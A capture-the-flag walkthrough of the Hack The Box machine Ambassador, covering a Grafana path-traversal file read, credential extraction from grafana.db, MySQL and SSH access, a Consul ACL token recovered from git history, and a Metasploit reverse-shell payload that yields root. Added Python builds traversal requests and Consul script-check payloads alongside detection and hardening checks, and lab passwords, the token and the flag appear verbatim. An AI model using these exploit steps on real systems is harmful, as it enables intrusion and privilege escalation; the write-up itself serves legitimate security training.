Target

https://app.hackthebox.com/machines/499

Target IP: 10.10.11.183, attacker IP: 10.10.16.4

Information gathering

Port enumeration with Nmap

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap 10.10.11.183
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 22:12 EST
Nmap scan report for 10.10.11.183
Host is up (0.54s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

Ports 22, 80, 3000 and 3306 are open. Run nmap again with **-sC -sV -p22,80,3000,3306** to fingerprint the services on just those ports (port 3000 is labelled "ppp" only because that is the IANA name for the port; the fingerprint below shows it is an HTTP service that redirects to /login).

nmap -sC -sV -p22,80,3000,3306 10.10.11.183

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
|   256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_  256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
3000/tcp open  ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Mon, 16 Jan 2023 05:57:44 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Mon, 16 Jan 2023 05:56:44 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Mon, 16 Jan 2023 05:56:56 GMT
|_ Content-Length: 0
3306/tcp open  mysql   MySQL 8.0.30-0ubuntu0.20.04.2
|_sslv2: ERROR: Script execution failed (use -d to debug)
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 15
| Capabilities flags: 65535
| Some Capabilities: SupportsTransactions, SwitchToSSLAfterHandshake, IgnoreSigpipes, Speaks41ProtocolOld, Support41Auth, IgnoreSpaceBeforeParenthesis, ODBCClient, InteractiveClient, SupportsCompression, Speaks41ProtocolNew, SupportsLoadDataLocal, LongPassword, DontAllowDatabaseTableColumn, ConnectWithDatabase, LongColumnFlag, FoundRows, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: V>&^\x1B1OLJ\x02*2"Ejt79\i
|_ Auth Plugin Name: caching_sha2_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.28_Auto_Generated_Server_Certificate
| Not valid before: 2022-03-13T22:27:05
|_Not valid after: 2032-03-10T22:27:05
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=1/16%Time=63C4E71A%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Mon,\x2016\x20Jan\x202023\x2005:56
SF::44\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Mo
SF:n,\x2016\x20Jan\x202023\x2005:56:56\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req
SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1
SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess
SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset
SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\
SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt
SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;
SF:\x20mode=block\r\nDate:\x20Mon,\x2016\x20Jan\x202023\x2005:57:44\x20GMT
SF:\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</a>\.\n\n"
SF:);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.72 seconds

Port 80 is a plain HTTP server, so open it in a browser. This is what it looks like:

There is a passage at the bottom of the page; roughly translated it says:

I didn't make much of it at the time, so on to port 3000.

Port 3000 is a login form that identifies itself as Grafana v8.2.0. A quick search shows this version falls in the range affected by an unauthenticated arbitrary file read through the plugin static-file handler, CVE-2021-43798 (Grafana 8.0.0-beta1 through 8.3.0; fixed in 8.3.1, 8.2.7, 8.1.8 and 8.0.7).

Vulnerability checks

Weak-password guesses against the login form failed, and my first attempt at the file-read bug didn't work either.

Not sure what to try next, I ran a directory scan.

Nothing interesting came out of it, so I searched searchsploit for grafana to see if there was a ready-made exploit:

searchsploit grafana
searchsploit -m multiple/webapps/50581.py
python 50581.py -H http://10.10.11.183:3000

It works. Now read Grafana's configuration and data files. One thing to keep in mind when reproducing this by hand: the server does not normalise the ../ segments, but most clients do before sending the request, so curl needs --path-as-is or the traversal never reaches the server.

The output is too messy to read in a terminal, so download the database file instead:

curl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

Open the file with sqlite3. The data_source table holds the MySQL data source Grafana was configured with, including its password in plaintext.

Use those credentials to log in to the MySQL server on port 3306.

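As an added example (not code from the write-up or from the 50581.py PoC), the following Python covers the two Grafana steps above: building the traversal request in the form the exploit sends, flagging the same pattern in access logs, and reading data-source credentials out of a downloaded grafana.db. The log lines and the database row are constructed; the data_source columns used are a subset of Grafana's real schema; the reverse proxy writing common-log-format lines in front of Grafana is an assumed deployment detail.

```python
# Added example, not code from the original write-up or the 50581.py PoC.
# Covers CVE-2021-43798 (Grafana plugin-path traversal) from both sides and
# the credential extraction from grafana.db.  Log lines and the database row
# are constructed; data_source columns are a subset of Grafana's schema.
import re
import sqlite3

# Plugin ids shipped with Grafana 8; /public/plugins/<id>/<file> serves files
# relative to the plugin directory without cleaning ".." out of the path.
BUNDLED_PLUGINS = ("alertlist", "annolist", "mysql", "postgres", "prometheus", "loki")


def traversal_path(target_file, plugin="alertlist", depth=8):
    """Request path that reads target_file (absolute path on the Grafana host)
    through the plugin static-file handler.  The dots must be sent literally
    (curl --path-as-is); a client that normalises the path sends /target_file
    instead and gets a 404, the usual reason a hand-built attempt 'fails'."""
    if plugin not in BUNDLED_PLUGINS:
        raise ValueError(f"{plugin!r} is not a plugin id bundled with Grafana 8")
    return f"/public/plugins/{plugin}/" + "../" * depth + target_file.lstrip("/")


# Detection: a request under /public/plugins/<id>/ containing a ".." segment,
# literal or percent-encoded, any case.
_TRAVERSAL_RE = re.compile(r"^/public/plugins/[^/]+/.*?(?:\.\.|%2e%2e)(?:/|%2f)", re.IGNORECASE)
# Request field of a common/combined log format line (assumed reverse-proxy log).
_CLF_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) ')


def is_traversal_attempt(path):
    return bool(_TRAVERSAL_RE.match(path))


def flag_requests(log_lines):
    """(source_ip, path) for every log line that is a traversal attempt."""
    hits = []
    for line in log_lines:
        m = _CLF_RE.match(line)
        if m and is_traversal_attempt(m.group("path")):
            hits.append((m.group("src"), m.group("path")))
    return hits


# Constructed access-log lines: a normal plugin asset fetch, a literal
# traversal and a percent-encoded one.
SAMPLE_LOG = [
    '10.10.14.9 - - [16/Jan/2023:05:50:01 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 4133',
    '10.10.16.4 - - [16/Jan/2023:05:57:44 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1876',
    '10.10.16.4 - - [16/Jan/2023:05:58:02 +0000] "GET /public/plugins/mysql/%2e%2e%2f%2e%2e%2fetc/grafana/grafana.ini HTTP/1.1" 200 9120',
]


def datasource_credentials(conn):
    """Rows of grafana.db's data_source table.  In Grafana 8 a data-source
    password may sit in the plain `password` column (as on this box) or be
    encrypted inside `secure_json_data`; only the plain column is read here."""
    cur = conn.execute("SELECT type, name, url, user, password, database FROM data_source")
    keys = ("type", "name", "url", "user", "password", "database")
    return [dict(zip(keys, row)) for row in cur.fetchall()]


def build_sample_db():
    """In-memory stand-in for a downloaded grafana.db (constructed row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE data_source (id INTEGER PRIMARY KEY, org_id INTEGER, "
        "type TEXT, name TEXT, url TEXT, user TEXT, password TEXT, "
        "database TEXT, secure_json_data TEXT)"
    )
    conn.execute(
        "INSERT INTO data_source VALUES (1, 1, 'mysql', 'mysql-prod', "
        "'localhost:3306', 'grafana', 'dontStandSoCloseToMe63221!', 'grafana', '{}')"
    )
    return conn


if __name__ == "__main__":
    print(traversal_path("/var/lib/grafana/grafana.db"))
    for src, path in flag_requests(SAMPLE_LOG):
        print(f"traversal attempt from {src}: {path}")
    for ds in datasource_credentials(build_sample_db()):
        print(f"{ds['type']} {ds['name']}: {ds['user']}:{ds['password']}@{ds['url']}/{ds['database']}")
```

If the password column is empty, the data source was saved with secureJsonData and the password is encrypted inside secure_json_data; decrypting it needs the secret_key from /etc/grafana/grafana.ini (Grafana ships with a default of SW2YcwTIb9zpOOhoPsMm, which is frequently left unchanged), and the same traversal reads that file.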
┌──(root㉿kali)-[/home/kali/Desktop]
└─# mysql -u grafana -p'dontStandSoCloseToMe63221!' -h 10.10.11.183 -P 3306
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 14
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| grafana            |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| whackywidget       |
+--------------------+
6 rows in set (0.707 sec)

MySQL [(none)]> use whackywidget;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.568 sec)

MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.435 sec)

MySQL [whackywidget]>

Now we have the developer password. The string looks like base64 (note the trailing == padding), so decode it. Base64 is an encoding, not encryption, and the trailing Cg== is an encoded newline, so strip the line break from the result before using it:

Username: developer   Password: anEnglishManInNewYork027468

Then it clicked: this is what the hint on port 80 was pointing at.

SSH in with it:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh developer@10.10.11.183
developer@10.10.11.183's password: anEnglishManInNewYork027468
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue 17 Jan 2023 09:08:06 AM UTC

System load: 0.03
Usage of /: 81.0% of 5.07GB
Memory usage: 51%
Swap usage: 0%
Processes: 227
Users logged in: 0
IPv4 address for eth0: 10.10.11.183
IPv6 address for eth0: dead:beef::250:56ff:feb9:5d49


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jan 17 07:09:24 2023 from 10.10.14.9
developer@ambassador:~$

Privilege escalation

Looking around /opt I found a directory called my-app, and inside it a .git directory. A repository on a production box is worth checking commit by commit, so I went through the git log with the following commands.

developer@ambassador:/opt$ cd my-app
developer@ambassador:/opt/my-app$ ls -la
total 24
drwxrwxr-x 5 root root 4096 Mar 13 2022 .
drwxr-xr-x 4 root root 4096 Sep 1 22:13 ..
drwxrwxr-x 4 root root 4096 Mar 13 2022 env
drwxrwxr-x 8 root root 4096 Mar 14 2022 .git
-rw-rw-r-- 1 root root 1838 Mar 13 2022 .gitignore
drwxrwxr-x 3 root root 4096 Mar 13 2022 whackywidget
developer@ambassador:/opt/my-app$ git log
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date: Sun Mar 13 23:47:36 2022 +0000

tidy config script

commit c982db8eff6f10f8f3a7d802f79f2705e7a21b55
Author: Developer <developer@ambassador.local>
Date: Sun Mar 13 23:44:45 2022 +0000

config script

commit 8dce6570187fd1dcfb127f51f147cd1ca8dc01c6
Author: Developer <developer@ambassador.local>
Date: Sun Mar 13 22:47:01 2022 +0000

created project with django CLI

commit 4b8597b167b2fbf8ec35f992224e612bf28d9e51
Author: Developer <developer@ambassador.local>
Date: Sun Mar 13 22:44:11 2022 +0000

.gitignore
developer@ambassador:/opt/my-app$ git show 33a53ef9a207976d5ceceddc41a199558843bf3c
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date: Sun Mar 13 23:47:36 2022 +0000

tidy config script

diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
# We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running

-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
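Review bot: Dropping `--token bb03b43b-1d81-d62b-24b5-39540ee469b5` from the `consul kv put` line only removes the token from HEAD; the parent commit c982db8 still carries it, so the token has to be rotated in Consul (and the history rewritten if the repository is shared) for this tidy-up to have any security effect. Two smaller points on the same lines: the script now depends on `CONSUL_HTTP_TOKEN` being exported, but nothing checks that it or `MYSQL_PASSWORD` is set, so an empty variable silently writes an empty password into the KV store; and `$MYSQL_PASSWORD` should be quoted (`"$MYSQL_PASSWORD"`) so a password containing spaces or glob characters is not split by the shell.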
developer@ambassador:/opt/my-app$
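The "tidy config script" commit removed the token from the working tree, not from the repository: the earlier blob is still in .git/objects, so git log -p (or git show on each commit) hands it straight back. As an added example, not code from the write-up, here is a small scanner over git log -p output that reports secret-looking strings on added and removed lines together with the commit and file they sit in. The sample text is constructed from the two commits shown above; the content of the earlier commit is assumed to be the file as it stood before the tidy-up.

```python
# Added example, not code from the original write-up.  Parses `git log -p`
# text and reports secret-looking strings on '+' and '-' lines.  A finding on
# a '-' line means the secret was deleted in that commit but is still
# reachable through the parent.  SAMPLE_GIT_LOG is constructed from the two
# commits in the page's git log; the earlier commit's file body is assumed.
import re

SECRET_PATTERNS = {
    # Consul ACL tokens are UUIDs
    "uuid_token": re.compile(r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b"),
    # key=value / key: value assignments of credential-like names
    "credential_assignment": re.compile(r"(?i)(password|passwd|secret|api[_-]?key)\s*[=:]\s*['\"]?([^\s'\"]{6,})"),
}


def scan_git_log(log_text):
    """Findings from `git log -p` output, newest commit first as git prints it."""
    commit = path = None
    findings = []
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
            continue
        if line.startswith("diff --git "):
            path = line.split(" b/", 1)[1]
            continue
        if line.startswith(("--- a/", "--- /dev/null", "+++ b/")):
            continue  # file headers, not content
        if line[:1] not in ("+", "-"):
            continue  # context, hunk headers, commit metadata
        for kind, pattern in SECRET_PATTERNS.items():
            m = pattern.search(line[1:])
            if m:
                findings.append({
                    "commit": commit[:7],
                    "file": path,
                    "kind": kind,
                    "removed": line[0] == "-",
                    "secret": m.group(m.lastindex or 0),
                })
    return findings


def secrets_removed_from_head(findings):
    """Secrets whose most recent change was a deletion: absent from HEAD,
    recoverable from history.  Relies on git's newest-first ordering."""
    latest = {}
    for f in findings:
        latest.setdefault(f["secret"], f)
    return {s: f["commit"] for s, f in latest.items() if f["removed"]}


SAMPLE_GIT_LOG = """\
commit 33a53ef9a207976d5ceceddc41a199558843bf3c
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script

diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
 # We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running

-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD

commit c982db8eff6f10f8f3a7d802f79f2705e7a21b55
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:44:45 2022 +0000

    config script

diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
new file mode 100755
index 0000000..35c08f6
--- /dev/null
+++ b/whackywidget/put-config-in-consul.sh
@@ -0,0 +1,4 @@
+# We use Consul for application config in production, this script will help set the correct values for the app
+# Export MYSQL_PASSWORD before running
+
+consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
"""

if __name__ == "__main__":
    found = scan_git_log(SAMPLE_GIT_LOG)
    for f in found:
        state = "removed in" if f["removed"] else "added in"
        print(f"{f['kind']}: {f['secret']} {state} {f['commit']} ({f['file']})")
    print("gone from HEAD but in history:", secrets_removed_from_head(found))
```

On the box the input would be `git -C /opt/my-app log -p --all`, which also covers branches and tags that the plain log does not show.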

So there is a Consul service on the box, and an ACL token that was taken out of the script in the later commit but is still sitting in the history.

Consul's agent HTTP API lets a caller with a suitable token register a service whose health check is a script; the agent then runs that script itself, and since the agent here runs as root, so does the script. Metasploit has a module for exactly this:

use exploit/multi/misc/consul_service_exec
options
set rhosts 10.10.11.183
set lhost 10.10.16.4 # change to your own IP
set payload linux/x86/meterpreter/reverse_tcp
run
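What the module does under the hood, as an added example (not code from the write-up or from Metasploit): it registers a service with a script health check over the agent API and deregisters it after the check has fired. The block below builds those two calls without sending them, and beside them checks an agent configuration for the settings that make the technique possible. The service name, check interval and both sample agent configs are constructed.

```python
# Added example, not code from the write-up or from Metasploit.  Shows the
# Consul mechanism behind exploit/multi/misc/consul_service_exec and the agent
# settings that enable it.  Service name, interval and configs are constructed.
import json
import uuid

CONSUL_API = "http://127.0.0.1:8500"  # agent HTTP API, reached over the ssh -L forward


def register_payload(command, service_name="app-health", interval="10s"):
    """Body for PUT /v1/agent/service/register: a service whose health check
    is a script.  The agent runs Args with its own privileges every Interval;
    when the agent runs as root, so does the command."""
    return {
        "ID": f"{service_name}-{uuid.uuid4().hex[:8]}",
        "Name": service_name,
        "Check": {
            "Name": f"{service_name} check",
            "Args": ["/bin/sh", "-c", command],
            "Interval": interval,
            "Timeout": "5s",
        },
    }


def api_calls(payload, token):
    """The two HTTP calls as (method, url, headers, body): register, then
    deregister once the check has fired so the command does not keep
    re-running.  Returned rather than sent, so this runs offline."""
    headers = {"X-Consul-Token": token, "Content-Type": "application/json"}
    return [
        ("PUT", f"{CONSUL_API}/v1/agent/service/register", headers, json.dumps(payload)),
        ("PUT", f"{CONSUL_API}/v1/agent/service/deregister/{payload['ID']}", headers, ""),
    ]


def assess_agent_config(cfg):
    """Findings for an agent config dict (the JSON/HCL the agent loads)."""
    findings = []
    if cfg.get("enable_script_checks"):
        findings.append("enable_script_checks=true: script checks can be registered over the HTTP API; "
                        "use enable_local_script_checks, which only honours checks from local config files")
    acl = cfg.get("acl", {})
    if not acl.get("enabled"):
        findings.append("acl.enabled is not true: any client reaching :8500 can register services")
    elif acl.get("default_policy", "allow") != "deny":  # Consul's default policy is allow
        findings.append("acl.default_policy is not deny: requests without a token are allowed")
    if cfg.get("client_addr", "127.0.0.1") != "127.0.0.1":
        findings.append(f"client_addr={cfg['client_addr']}: HTTP API is reachable beyond localhost")
    return findings


# Constructed configs: the weak one next to the hardened one.
WEAK_AGENT_CONFIG = {
    "enable_script_checks": True,
    "acl": {"enabled": True, "default_policy": "allow"},
}
HARDENED_AGENT_CONFIG = {
    "enable_local_script_checks": True,
    "client_addr": "127.0.0.1",
    "acl": {"enabled": True, "default_policy": "deny", "enable_token_persistence": True},
}

if __name__ == "__main__":
    payload = register_payload("id > /tmp/consul-check.out")
    for method, url, headers, body in api_calls(payload, "<token recovered from git history>"):
        print(method, url, body)
    for name, cfg in (("weak", WEAK_AGENT_CONFIG), ("hardened", HARDENED_AGENT_CONFIG)):
        print(name, assess_agent_config(cfg) or ["no findings"])
```

Even with a management token, the register call only yields code execution when the agent allows script checks from the API; with enable_local_script_checks the same request is rejected, which is the configuration to ask for when the box is handed back.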

It errored out: the module could not connect to the Consul API. Consul's HTTP API listens on 127.0.0.1:8500 by default, so it isn't reachable from the attack box directly. The fix is an SSH local port forward that maps the target's port 8500 to port 8500 on Kali, then pointing the module at 127.0.0.1 and giving it the token recovered from the git history:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh -L 8500:0.0.0.0:8500 developer@10.10.11.183
developer@10.10.11.183's password: anEnglishManInNewYork027468
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue 17 Jan 2023 09:32:23 AM UTC

System load: 0.01
Usage of /: 81.0% of 5.07GB
Memory usage: 52%
Swap usage: 0%
Processes: 229
Users logged in: 1
IPv4 address for eth0: 10.10.11.183
IPv6 address for eth0: dead:beef::250:56ff:feb9:5d49


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jan 17 09:08:08 2023 from 10.10.16.4
developer@ambassador:~$
┌──(root㉿kali)-[/home/kali/Desktop]
└─# msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp; set rhosts 127.0.0.1; set lhost 10.10.16.4; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"

meterpreter > getuid
Server username: root
meterpreter > dir
Listing: /
==========

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040755/rwxr-xr-x 36864 dir 2022-09-27 10:49:17 -0400 bin
040755/rwxr-xr-x 4096 dir 2022-09-27 10:50:57 -0400 boot
040755/rwxr-xr-x 3980 dir 2023-01-17 00:26:36 -0500 dev
040755/rwxr-xr-x 4096 dir 2022-09-01 21:39:18 -0400 development-machine-documentation
040755/rwxr-xr-x 4096 dir 2022-09-27 10:49:35 -0400 etc
040755/rwxr-xr-x 4096 dir 2022-03-13 13:27:26 -0400 home
040755/rwxr-xr-x 4096 dir 2022-09-15 12:37:47 -0400 lib
040755/rwxr-xr-x 4096 dir 2022-02-23 03:49:52 -0500 lib32
040755/rwxr-xr-x 4096 dir 2022-09-15 12:37:22 -0400 lib64
040755/rwxr-xr-x 4096 dir 2022-02-23 03:49:52 -0500 libx32
040700/rwx------ 16384 dir 2022-03-13 13:17:09 -0400 lost+found
040755/rwxr-xr-x 4096 dir 2022-03-13 22:53:24 -0400 media
040755/rwxr-xr-x 4096 dir 2022-02-23 03:50:00 -0500 mnt
040755/rwxr-xr-x 4096 dir 2022-09-01 18:13:17 -0400 opt
040555/r-xr-xr-x 0 dir 2023-01-17 00:26:25 -0500 proc
040700/rwx------ 4096 dir 2022-09-14 13:13:20 -0400 root
040755/rwxr-xr-x 900 dir 2023-01-17 04:32:24 -0500 run
040755/rwxr-xr-x 20480 dir 2022-09-27 10:48:45 -0400 sbin
040755/rwxr-xr-x 4096 dir 2022-02-23 03:57:00 -0500 snap
040755/rwxr-xr-x 4096 dir 2022-02-23 03:50:00 -0500 srv
040555/r-xr-xr-x 0 dir 2023-01-17 00:26:26 -0500 sys
041777/rwxrwxrwx 4096 dir 2023-01-17 04:35:37 -0500 tmp
040755/rwxr-xr-x 4096 dir 2022-02-23 03:53:41 -0500 usr
040755/rwxr-xr-x 4096 dir 2022-03-13 15:32:52 -0400 var

meterpreter > cat /root/root.txt
bbdd0280d2e3af06211d91aadbc96740
meterpreter >